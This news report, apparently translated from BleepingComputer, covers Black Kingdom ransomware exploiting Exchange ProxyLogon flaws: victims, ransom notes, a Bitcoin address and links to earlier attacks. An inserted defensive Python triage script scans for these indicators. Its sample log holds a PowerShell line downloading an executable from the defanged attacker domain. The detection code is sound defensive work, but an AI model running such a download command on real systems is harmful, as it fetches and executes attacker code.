
Black Kingdom ransomware: Targets Microsoft Exchange servers. Greece among the victims

Another ransomware operation, known as Black Kingdom, is exploiting the Microsoft Exchange Server ProxyLogon vulnerabilities to encrypt servers. Over the weekend, security researcher Marcus Hutchins, also known as MalwareTechBlog, reported on Twitter that threat actors were compromising Microsoft Exchange servers through the ProxyLogon vulnerabilities in order to deploy ransomware.


Based on logs from his honeypots, Hutchins reported that the attackers exploited the vulnerabilities to run a PowerShell script that downloads the ransomware executable from "Yuuuuu44[.]Com" and then spreads it to other computers on the network.


Based on submissions to the ID Ransomware site, victims' devices were encrypted as part of the Black Kingdom campaign, with the first submissions appearing on March 18th.

Michael Gillespie, creator of ID Ransomware, told BleepingComputer that his system has seen more than 30 unique submissions, many of them submitted directly from mail servers.

The victims are in Greece, the USA, Canada, Austria, Switzerland, Russia, France, Israel, the United Kingdom, Italy, Germany, Australia and Croatia.


When encrypting a device, the ransomware appends a random extension to each encrypted file and then drops a ransom note named decrypt_file.TxT. Hutchins pointed out that he also saw a different ransom note, named ReadMe.txt, with different text.
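As an added illustration (not code from the article, from BleepingComputer or from the researchers it cites), the following Python script runs a defender-side triage over constructed PowerShell log lines and a constructed file listing, looking for the indicators the article names: the download domain from the honeypot logs, the two ransom-note file names, and clusters of files sharing a random-looking extension. The random-extension heuristic, the sample log lines, the placeholder payload name and the sample paths are assumptions, not observed data.

```python
import re

# Indicators named in the article. Note names are compared case-insensitively
# because the note was observed as decrypt_file.TxT.
RANSOM_NOTE_NAMES = {"decrypt_file.txt", "readme.txt"}
DOWNLOAD_DOMAIN = "yuuuuu44.com"

# Heuristic (assumption, not from the article): an extension of 6+ alphanumerics
# shared by several files is treated as a possible encryption marker.
RANDOM_EXT = re.compile(r"\.([a-z0-9]{6,})$", re.IGNORECASE)
COMMON_LONG_EXT = {"config", "sqlite", "backup"}  # reduces false positives

def refang(text):
    """Turn a defanged indicator such as 'example[.]com' back into 'example.com'."""
    return re.sub(r"\s*\[\.\]\s*", ".", text)

def lines_referencing_domain(log_lines):
    """Return log lines that mention the download domain, defanged or not."""
    return [line for line in log_lines if DOWNLOAD_DOMAIN in refang(line).lower()]

def ransom_notes(paths):
    """Return paths whose file name matches one of the known ransom-note names."""
    return sorted(p for p in paths
                  if p.replace("\\", "/").rsplit("/", 1)[-1].lower() in RANSOM_NOTE_NAMES)

def random_extension_clusters(paths, min_files=3):
    """Map random-looking extensions to the files carrying them, keeping clusters of min_files or more."""
    clusters = {}
    for p in paths:
        match = RANDOM_EXT.search(p)
        if match and match.group(1).lower() not in COMMON_LONG_EXT:
            clusters.setdefault(match.group(1), []).append(p)
    return {ext: files for ext, files in clusters.items() if len(files) >= min_files}

def triage(log_lines, paths):
    """Combine the three checks into one report for an analyst."""
    return {"domain_hits": lines_referencing_domain(log_lines),
            "ransom_notes": ransom_notes(paths),
            "extension_clusters": random_extension_clusters(paths)}

# Constructed sample data (not captured from a real incident).
SAMPLE_LOG = [
    "2021-03-21 03:14:07 ScriptBlock: Invoke-WebRequest -Uri http://yuuuuu44[.]com/PAYLOAD_PLACEHOLDER.exe",
    "2021-03-21 03:15:02 ScriptBlock: Get-MailboxDatabase | Format-Table",
]
SAMPLE_PATHS = [
    r"C:\inetpub\wwwroot\decrypt_file.TxT", r"C:\Users\Public\ReadMe.txt",
    r"C:\Users\Public\report.docx", r"C:\Users\Public\budget.xlsx.k7q2m9xz",
    r"C:\Users\Public\photo.jpg.k7q2m9xz", r"C:\Users\Public\notes.txt.k7q2m9xz",
    r"C:\ProgramData\app\settings.config",
]

if __name__ == "__main__":
    print(triage(SAMPLE_LOG, SAMPLE_PATHS))
```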


BleepingComputer has seen ransom notes demanding $10,000 in Bitcoin and using the same Bitcoin address (1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT) for payment. This Bitcoin address has received only one payment, on March 18.


A ransomware also known as BlackKingdom was used in attacks in June 2020, when attackers broke into corporate networks by exploiting vulnerabilities in Pulse VPN.


Although it has not yet been confirmed whether the recent attacks and those from the summer of 2020 use the same ransomware, Hutchins said the current ransomware executable is a Python script compiled into a Windows executable. The Black Kingdom ransomware from June 2020 was also written in Python.

Victims of the recent Black Kingdom attacks may be able to recover their files with help from the cybersecurity company Emsisoft.


Black Kingdom is the second confirmed ransomware to target Microsoft Exchange ProxyLogon vulnerabilities. The first was DearCry ransomware, which was used in a limited number of attacks earlier this month.


Recently, Acer, the sixth-largest electronics maker in the world, was attacked by the REvil ransomware gang, which is believed to have gained access by exploiting the ProxyLogon vulnerabilities. However, this has not been confirmed so far.

Source of information: bleepingcomputer.com
